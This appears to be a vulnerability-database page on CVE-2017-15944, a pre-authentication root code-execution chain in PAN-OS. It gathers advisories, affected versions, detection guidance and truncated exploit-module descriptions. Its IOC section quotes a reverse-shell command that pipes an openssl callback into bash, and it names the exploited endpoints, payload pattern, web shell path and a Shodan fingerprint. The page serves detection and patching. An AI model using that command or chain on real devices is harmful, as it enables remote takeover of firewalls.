CVE-2017-15944
published 2017-12-11CVE-2017-15944: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-09-08
Exploited in the wild
EPSS
98.34%
99.9th percentile
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | < 6.1.19 | 6.1.19 |
| paloaltonetworks | pan-os | >= 7.0.0 < 7.0.19 | 7.0.19 |
| paloaltonetworks | pan-os | >= 7.1.0 < 7.1.14 | 7.1.14 |
| paloaltonetworks | pan-os | >= 8.0.0 < 8.0.6 | 8.0.6 |
Detection & IOCsextracted from sources · hover to see the quote
command* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; ↗
- →Detect the authentication bypass trigger: monitor HTTP GET requests to /esp/cms_changeDeviceContext.esp containing the session-corruption payload pattern (single-quote + ";user|s.) in the device parameter. ↗
- →Detect exploitation of the XML injection / directory creation step: monitor HTTP POST requests to /php/utils/router.php containing 'Administrator.get' with 'async-mode' and directory traversal sequences (../../) in the JSON body. ↗
- →Alert on creation of or HTTP access to the web shell path /var/appweb/htdocs/api/c.php or /api/c.php on PAN-OS management interfaces. ↗
- →Alert on creation of the SUID root binary /bin/x on PAN-OS devices, which is dropped by the exploit payload. ↗
- →Monitor the cron-executed scripts /usr/local/bin/genindex_batch.sh and /usr/local/bin/genindex.sh for anomalous directory names under /opt/pancfg/mgmt/logdb/ containing shell metacharacters or -exec arguments, which indicate exploitation of the command injection in the cron script. ↗
- →Use Palo Alto Networks vulnerability signatures #40483 and #40484 (content update 756) applied to firewall rules protecting the management interface as an interim detection/mitigation control. ↗
- →Identify exposed PAN-OS management interfaces via Shodan using favicon hash -631559155 or FOFA icon_hash=-631559155. ↗
- →Detect the Metasploit module's reverse TLS staging callback: an outbound openssl s_client connection from the PAN-OS management plane to an external host, piped to bash. ↗
- ·PAN-OS 8.0 (before 8.0.6) is patched but was NOT remotely exploitable by an unauthenticated user via this specific vulnerability chain; the unauthenticated pre-auth RCE path applies to PAN-OS 6.1.18 and earlier, 7.0.18 and earlier, and 7.1.13 and earlier. ↗
- ·The exploit chain requires the web management interface to be reachable by the attacker; Palo Alto Networks recommends not exposing the management interface to the internet, which significantly reduces attack surface. ↗
- ·The cron-based command injection stage fires every 15 minutes; exploitation can take up to 20 minutes end-to-end, so detection must account for delayed payload execution rather than immediate shell activity. ↗
- ·The authentication bypass does NOT produce a fully valid logged-in session; most PHP scripts will still fail, but the panAuthCheck directive in the web server is bypassed, allowing access to specific protected PHP endpoints. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
cisa·2022-08-18·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Vulnerability: Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Affected: Palo Alto Networks PAN-OS
Palo Alto Networks PAN-OS contains multiple, unspecified vulnerabilities which can allow for remote code execution when chained.
Required Action: Apply updates per vendor instructions.
Notes: https://security.paloaltonetworks.com/CVE-2017-15944; https://nvd.nist.gov/vuln/detail/CVE-2017-15944
Remediation Due Date: 2022-09-08
Palo Alto
Vulnerability in PAN-OS and Panorama on Management Interface
vendor_paloalto·2017-12-06·CVSS 9.8
CVE-2017-15944 [CRITICAL] Vulnerability in PAN-OS and Panorama on Management Interface
Vulnerability in PAN-OS and Panorama on Management Interface
Through the exploitation of a combination of unrelated vulnerabilities, and via the management interface of the device, an attacker could remotely execute code on PAN-OS or Panorama in the context of the highest privileged user. (Ref # PAN-61094 / PAN-80990 / PAN-80993 / PAN-80994 / CVE-2017-15944)
PAN-OS and Panorama contains multiple vulnerabilities that, when exploited in conjunction could lead to remote code execution prior to authentication.
This issue affects PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, and PAN-OS 7.1.13 and earlier.
Affected products: PAN-OS
Solution: PAN-OS 6.1.19 and later, PAN-OS 7.0.19 and later, PAN-OS 7.1.14 and later. An update in PAN-OS 8.0.6 also includes patches related to this vulner
GHSA
GHSA-9ppr-hv62-39w2: Palo Alto Networks PAN-OS before 6
ghsa_unreviewed·2022-05-13
CVE-2017-15944 [CRITICAL] CWE-20 GHSA-9ppr-hv62-39w2: Palo Alto Networks PAN-OS before 6
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
VulnCheck
Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Palo Alto Networks PAN-OS contains multiple, unspecified vulnerabilities which can allow for remote code execution when chained.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2017-15944; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2017-15944; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-01&host_type=src&vulnerability=cve-2017-15944; http
No detection rules found.
Exploit-DB
Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
exploitdb·2018-05-08
CVE-2017-15944 Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Palo Alto Networks readSessionVarsFromFile() Session Corruption',
'Description' => %q{
This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the targ
Exploit-DB
Palo Alto Networks Firewalls - Root Remote Code Execution
exploitdb·2017-12-14·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks Firewalls - Root Remote Code Execution
Palo Alto Networks Firewalls - Root Remote Code Execution
---
This is a public advisory for CVE-2017-15944 which is a remote root code
execution bug in Palo Alto Networks firewalls.
Three separate bugs can be used together to remotely execute commands as
root through the web management interface without authentication on: PAN-OS
6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier,
PAN-OS 8.0.5 and earlier.
Palo Alto Networks recommends not exposing the web management interface to
the internet. By looking at Project Sonar or Shodan it is evident that it's
actually quite common to deploy the firewalls with the web management
interface listening on the WAN port.
PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched
and can be downloaded from https:
Metasploit
Palo Alto Networks readSessionVarsFromFile() Session Corruption
metasploit
Palo Alto Networks readSessionVarsFromFile() Session Corruption
Palo Alto Networks readSessionVarsFromFile() Session Corruption
This module exploits a chain of vulnerabilities in Palo Alto Networks products running PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using an authentication bypass flaw to to exploit an XML injection issue, which is then abused to create an arbitrary directory, and finally gains root code execution by exploiting a vulnerable cron script. This module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
Nuclei
Palo Alto Network PAN-OS - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Network PAN-OS - Remote Code Execution
Palo Alto Network PAN-OS - Remote Code Execution
Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Template:
id: CVE-2017-15944
info:
name: Palo Alto Network PAN-OS - Remote Code Execution
author: emadshanab,milo2012
severity: critical
description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest sec
No writeups or analysis indexed.
http://www.securityfocus.com/bid/102079http://www.securitytracker.com/id/1040007https://security.paloaltonetworks.com/CVE-2017-15944https://www.exploit-db.com/exploits/43342/https://www.exploit-db.com/exploits/44597/http://www.securityfocus.com/bid/102079http://www.securitytracker.com/id/1040007https://security.paloaltonetworks.com/CVE-2017-15944https://www.exploit-db.com/exploits/43342/https://www.exploit-db.com/exploits/44597/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-15944
2017-12-11
Published
2022-08-18
Added to CISA KEV
Exploited in the wild